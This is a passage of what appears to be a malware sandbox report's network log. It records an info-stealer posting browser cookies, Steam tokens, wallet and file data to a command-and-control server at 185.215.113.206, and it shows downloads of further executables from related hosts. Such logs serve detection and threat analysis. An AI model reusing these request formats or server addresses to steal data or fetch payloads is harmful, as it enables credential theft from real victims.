0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 2d 2d 0d 0a Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------IDAAFBGDBKJJJKFIIIJJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 2d 2d 0d 0a Data Ascii: ------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="file"------KJDGDGDHDGDBFIDHDBAF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 2d 2d 0d 0a Data Ascii: ------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="file"------KJDGDGDHDGDBFIDHDBAF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 2d 2d 0d 0a Data Ascii: ------FIIEHJDBKJKECBFHDGHJContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------FIIEHJDBKJKECBFHDGHJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIIEHJDBKJKECBFHDGHJContent-Disposition: form-data; name="file"------FIIEHJDBKJKECBFHDGHJ--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBAECGCBKECAAAEBFHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHDHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="message"wallets------HJEBGHIEBFIJKECBKFHD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCAHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 2d 2d 0d 0a Data Ascii: ------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="message"files------GIJECGDGCBKECAKFBGCA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file"------GDHIDHIEGIIIECAKEBFB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 2d 2d 0d 0a Data Ascii: ------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="message"ybncbhylepme------ECFHJKEBAAECBFHIECGI--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BKFBAKFCBFHIJJJJDBFC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013581001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013582001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013583001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCBKKKFHCGCBFIJEHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 36 36 34 45 38 38 38 32 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="hwid"B3664E8882872556134559------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="build"stok------EGHCBKKKFHCGCBFIJEHD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013584001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013585001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGIIJDGHCAKFHJEHCFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 49 49 4a 44 47 48 43 41 4b 46 48 4a 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 36 36 34 45 38 38 38 32 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 49 49 4a 44 47 48 43 41 4b 46 48 4a 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 49 49 4a 44 47 48 43 41 4b 46 48 4a 45 48 43 46 2d 2d 0d 0a Data Ascii: ------AKEGIIJDGHCAKFHJEHCFContent-Disposition: form-data; name="hwid"B3664E8882872556134559------AKEGIIJDGHCAKFHJEHCFContent-Disposition: form-data; name="build"stok------AKEGIIJDGHCAKFHJEHCF--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCGIJDHDGDBGDGCGCFHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 36 36 34 45 38 38 38 32 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 